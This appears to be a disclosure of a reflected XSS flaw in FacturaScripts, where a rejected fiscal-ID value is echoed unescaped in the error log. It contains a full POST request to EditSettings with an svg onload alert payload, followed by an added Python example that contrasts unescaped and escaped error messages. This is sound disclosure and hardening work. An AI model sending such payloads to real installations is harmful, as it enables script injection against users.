There are two fields through which an XSS payload can be injected via the error log:
- codbalance field
- tipoidfiscal field in Fiscal Id
Both fields require between 1 and 25 numbers or letters, with no spaces, accents or any other character, so the payload cannot be stored. The rejected value is still echoed back in the error log, however, which triggers a reflected XSS.
POST /facturascripts/EditSettings HTTP/1.1
Host: 127.0.0.1
...
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="action"
edit
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="activetab"
EditIdentificadorFiscal
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="code"
CI
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="multireqtoken"
61893af8ff1671201dcbeaff4d052cf544c4de1e|MvOEut
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="tipoidfiscal"
CI<svg/onload='alert(/xss/);'>
------WebKitFormBoundaryYIfWjQXpEB2jLexN
Content-Disposition: form-data; name="codeid"
------WebKitFormBoundaryYIfWjQXpEB2jLexN--
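The root cause described above is a rejected value being reflected unescaped into the validation error. The following added example (not FacturaScripts code; the regex, function names and messages are assumptions) shows the vulnerable pattern beside the hardened one, where the error message HTML-escapes the rejected input at the output sink:

```python
import html
import re

# Validation rule as described in the report (assumed regex): 1 to 25 letters
# or digits, no spaces, accents or other characters.
FISCAL_ID_RE = re.compile(r"^[A-Za-z0-9]{1,25}$")


def validate_fiscal_id(value: str) -> bool:
    """Return True when the value satisfies the field's format rule."""
    return FISCAL_ID_RE.fullmatch(value) is not None


def error_message_unsafe(field: str, value: str) -> str:
    """Vulnerable pattern: the rejected input is echoed verbatim into HTML.

    Validation keeps the value out of the database, but the error text still
    reflects attacker-controlled markup to the browser (reflected XSS)."""
    return f"<p class='error'>Invalid value for {field}: {value}</p>"


def error_message_safe(field: str, value: str) -> str:
    """Hardened pattern: HTML-escape the rejected input where it is rendered."""
    escaped = html.escape(value, quote=True)
    return f"<p class='error'>Invalid value for {field}: {escaped}</p>"


def handle_submission(field: str, value: str, safe: bool = True) -> tuple[bool, str]:
    """Simulate the handler: accept valid values, otherwise build the error."""
    if validate_fiscal_id(value):
        return True, ""
    builder = error_message_safe if safe else error_message_unsafe
    return False, builder(field, value)


def contains_raw_markup(rendered: str, submitted: str) -> bool:
    """Detection check: does the rendered error still carry the raw submitted markup?"""
    return submitted in rendered


if __name__ == "__main__":
    # Constructed sample inputs: one valid code and one rejected value with markup.
    for value in ("CI", "CI<b>x</b>"):
        for safe in (False, True):
            ok, msg = handle_submission("tipoidfiscal", value, safe=safe)
            print(f"safe={safe} accepted={ok} rendered={msg!r}")
```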